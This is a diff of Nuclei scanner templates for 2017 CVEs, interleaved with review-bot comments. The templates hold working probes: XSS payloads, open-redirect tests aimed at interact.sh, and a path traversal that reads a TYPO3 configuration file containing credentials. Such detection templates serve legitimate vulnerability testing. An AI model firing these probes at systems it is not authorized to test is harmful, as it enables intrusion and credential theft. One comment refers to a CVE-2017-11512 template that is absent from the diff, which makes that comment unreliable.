No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-11610.yaml b/nuclei-templates/CVE-2017/CVE-2017-11610.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-11610.yaml rename to nuclei-templates/CVE-2017/CVE-2017-11610.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-11629.yaml b/nuclei-templates/CVE-2017/CVE-2017-11629.yaml index 5cb529d6b9..27471932c3 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-11629.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-11629.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-11629 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40119 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: finecms + product: finecms tags: cve,cve2017,xss,finecms -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php" 
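Review bot: The `remediation` text in the new CVE-2017-11512 template tells operators to `Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328`, which is the very build the `description` and `cpe` name as vulnerable, so the advice is self-contradictory; reword it to `Upgrade ManageEngine ServiceDesk to a release later than 9.3.9328 that fixes the /fosagent/repl path traversal (see the Tenable advisory).`. Both probes request `..\..\Windows\win.ini`, so a Linux deployment of the same build would be a false negative; if that platform is in scope, a second path for `/etc/passwd` with a `root:.*:0:0:` matcher would close the gap, though I have not confirmed the agent's behaviour on Linux.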
@@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/31 +# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-12138.yaml b/nuclei-templates/CVE-2017/CVE-2017-12138.yaml index f1dcb57708..98472b843b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12138.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12138.yaml 
@@ -3,26 +3,47 @@ id: CVE-2017-12138 info: name: XOOPS Core 2.5.8 - Open Redirect author: 0x_Akoko - severity: low - description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter. + severity: medium + description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: - https://github.com/XOOPS/XoopsCore25/issues/523 - - https://www.cvedetails.com/cve/CVE-2017-12138 - tags: cve,cve2017,redirect,xoops + - https://xoops.org + - https://nvd.nist.gov/vuln/detail/CVE-2017-12138 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-12138 cwe-id: CWE-601 + epss-score: 0.00062 + epss-percentile: 0.24419 + cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: xoops + product: xoops + tags: cve,cve2017,redirect,xoops,authenticated -requests: - - method: GET +http: + - raw: + - | + POST /user.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - path: - - '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https://www.example.com' + uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login + - | + GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1 + 
Host: {{Hostname}} matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml old mode 100755 new mode 100644 diff --git a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml index 232be74216..4ee30b5e16 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml 
@@ -1,21 +1,34 @@ id: CVE-2017-12583 info: - name: Reflected XSS in doku.php + name: DokuWiki - Cross-Site Scripting author: DhiyaneshDK severity: medium - metadata: - shodan-query: 'http.title:"DokuWiki"' - description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php." - reference: https://github.com/splitbrain/dokuwiki/issues/2061 + description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 + epss-score: 0.00117 + epss-percentile: 0.44712 + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dokuwiki + product: dokuwiki + shodan-query: http.title:"DokuWiki" tags: cve,cve2017,xss,dokuwiki -requests: +http: - method: GET path: - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' 
@@ -35,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12611.yaml b/nuclei-templates/CVE-2017/CVE-2017-12611.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12611.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12611.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12617.yaml b/nuclei-templates/CVE-2017/CVE-2017-12617.yaml index 66def8bc94..ff6836350e 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-12617.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-12617.yaml @@ -1,4 +1,4 @@ -id: "CVE-2017-12617" +id: CVE-2017-12617 info: name: Apache Tomcat - Remote Code Execution @@ -6,6 +6,8 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.1 cve-id: "CVE-2017-12617" cwe-id: CWE-434 - epss-score: 0.9747 - epss-percentile: 0.99958 + epss-score: 0.97533 + epss-percentile: 0.99992 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" 
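Review bot: In the CVE-2017-12617 hunk the `remediation` line kept next to the newly added `impact` contradicts the `description` two lines above it: the description lists `7.0.0 to 7.0.81` as vulnerable, yet the remediation says `Upgrade to Apache Tomcat version 7.0.80 or later`, which points operators at a version the template itself calls exploitable. It should name a release above 7.0.81 and cover the other branches the description lists; per the Apache advisory the fixed releases are 7.0.82, 8.0.47, 8.5.23 and 9.0.1, which should be confirmed before committing: `Upgrade to Apache Tomcat 7.0.82, 8.0.47, 8.5.23 or 9.0.1 (or later) to mitigate this vulnerability.`. The template's request and matcher blocks lie outside this hunk.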
@@ -28,7 +30,7 @@ info: vendor: apache product: tomcat shodan-query: html:"Apache Tomcat" - tags: cve,cve2017,tomcat,apache,rce,kev,intrusive + tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: - raw: @@ -51,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081dd15a574ca1994acb413595d6dc1c949337710a23b15994c76be8a30ad21fe02200ee6bd71c2ae1e2652e65a43d43cbd1ec2bef89a1637ddc3604e1d71b58c76b9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12794.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12794.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-14135.yaml b/nuclei-templates/CVE-2017/CVE-2017-14135.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-14135.yaml rename to nuclei-templates/CVE-2017/CVE-2017-14135.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-14186.yaml b/nuclei-templates/CVE-2017/CVE-2017-14186.yaml index dfd8631bb8..e70352dcf8 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14186.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14186.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. + remediation: | + Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-14186 cwe-id: CWE-79 + epss-score: 0.02948 + epss-percentile: 0.89847 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: fortinet + product: fortios shodan-query: port:10443 http.favicon.hash:945408572 - verified: "true" - tags: cve,cve2017,fortigate,xss,fortinet -requests: + tags: cve2017,cve,fortigate,xss,fortinet + +http: - method: GET path: - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" 
@@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/11 +# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml b/nuclei-templates/CVE-2017/CVE-2017-14524.yaml index be7c67f156..e87149510b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14524.yaml 
@@ -1,40 +1,25 @@ id: CVE-2017-14524 - info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect author: 0x_Akoko - severity: medium - description: | - OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. + severity: low + description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 - - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://www.cvedetails.com/cve/CVE-2017-14524 + - https://vuldb.com/?id.107201 + tags: cve,cve2017,redirect,opentext classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2017-14524 cwe-id: CWE-601 - epss-score: 0.00258 - epss-percentile: 0.63405 - cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: opentext - product: documentum_administrator - tags: cve,cve2017,redirect,opentext,seclists - -http: +requests: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' - + - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 
4a0a00473045022067c66ad6a35140adea527b46677371897d097f59fd7bc558671a8532fbb99f4e022100f1adf441d12b7d3fbfbd021a1de838d34432ef3d8740bbd1f69fec1252a7ca12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2017/CVE-2017-14622.yaml b/nuclei-templates/CVE-2017/CVE-2017-14622.yaml index 2340ac5799..14d594b33d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-14622.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-14622.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 - https://nvd.nist.gov/vuln/detail/CVE-2017-14622 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48561 + epss-percentile: 0.47816 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true 
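Review bot: The CVE-2017-14524 hunk introduces an internal inconsistency: `severity` is lowered to `low` while `cvss-score` is set to `6.10` with vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`, a medium score under CVSS v3 (4.0–6.9), so the two fields now disagree. The same hunk drops `cpe`, `epss-score`, `metadata.max-request`, the NVD and vendor references and the template `digest`, reverts `http:` to the legacy `requests:` key, and changes the redirect probe from `//oast.me` back to `//example.com`, a domain the tester does not control. Unless the rollback to the older revision is intentional, the old side should be retained; at minimum `severity: medium` must be restored so it agrees with the stated CVSS score.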
@@ -27,7 +30,7 @@ info: vendor: 2kblater product: 2kb_amazon_affiliates_store framework: wordpress - tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm + tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater http: - raw: @@ -50,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 490a00463044022028958230f8a40abbd7c8489fd5149c05865443e53a572c02f6ec22738c0cda860220348fa263e025a0d9fbc89c8bcdc498b79f9b7cf247e6f596c9bdd82386bb58e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml index 1d02d679db..144181dec3 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml @@ -1,4 +1,5 @@ id: CVE-2017-15287 + info: name: Dreambox WebControl 2.0.0 - Cross-Site Scripting author: pikpikcu @@ -15,12 +16,14 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 tags: cve,cve2017,xss,dreambox + requests: - raw: - | GET /webadmin/pkg?command= HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers: - type: word words: diff --git a/nuclei-templates/CVE-2017/CVE-2017-15363.yaml b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml index 45ee25fecd..aafe16b2b5 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-15363.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml 
@@ -13,21 +13,24 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-98 tags: cve,cve2017,restler,lfi + requests: - method: GET path: - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php" + matchers-condition: and matchers: - type: word - words: - - "database" - - "host" - - "password" - - "port" - - "username" part: body + words: + - "\">All
" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google AdSense")' + condition: and +# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18490.yaml b/nuclei-templates/CVE-2017/CVE-2017-18490.yaml index f1db2cb3e5..bcbe1eff61 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18490.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: contact_form_multi framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-multi/" - tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi + tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4a0a0047304502210088adfd2411310401e44b49da3084320b78d6f55e0981c43ee738636156a26a990220272bb45208daa279af3ff70f1414b38e91b28691032cf045cb88c95d09a29d42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2017/CVE-2017-18491.yaml b/nuclei-templates/CVE-2017/CVE-2017-18491.yaml index 41afaa4ccc..73517d0595 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18491.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: contact_form framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-plugin/" - tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a004630440220203aafce6366113241d95488aea53216df347aac7feb8a2dd590fae6e3ff1c500220048e995f1d8d71aba72d1417c1bac63fe901566d78c3781b06aaf4cf4908fa8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18492.yaml b/nuclei-templates/CVE-2017/CVE-2017-18492.yaml index 14dcc4ecb5..c7fa05e53a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18492.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -26,7 +26,7 @@ info: product: contact_form_to_db framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-to-db/" - tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4b0a00483046022100a70ae9b55be5f675d9dffff25aacca6f0df2f52469be2504c28033d4dbae1e33022100affe9b3e411d408f8602bb356fbd2e1394ce29302d62814b1a34098115af0764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18493.yaml b/nuclei-templates/CVE-2017/CVE-2017-18493.yaml index 4d7901b921..0d6b511623 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18493.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: custom_admin_page framework: wordpress publicwww-query: "/wp-content/plugins/custom-admin-page/" - tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: 
@@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4a0a0047304502205647930cba85d71e9016c68c7d53f0ea979fce8262c06573af3db4d5e3507940022100ed89e326160e41f336646e6ce61c6ea1bae98337053401aa36db0e304310cfd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18494.yaml b/nuclei-templates/CVE-2017/CVE-2017-18494.yaml index 746248f338..f35075d372 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18494.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: custom_search framework: wordpress publicwww-query: "/wp-content/plugins/custom-search-plugin/" - tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a004730450220521a1b85bd59b69bd22d77d449825ac58c78a76d8200ab871c093577ee59d97a022100be896fea94f678b0ceeff6660d8170ffc70d8f779cf92d3eb91d13c6e97b0110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
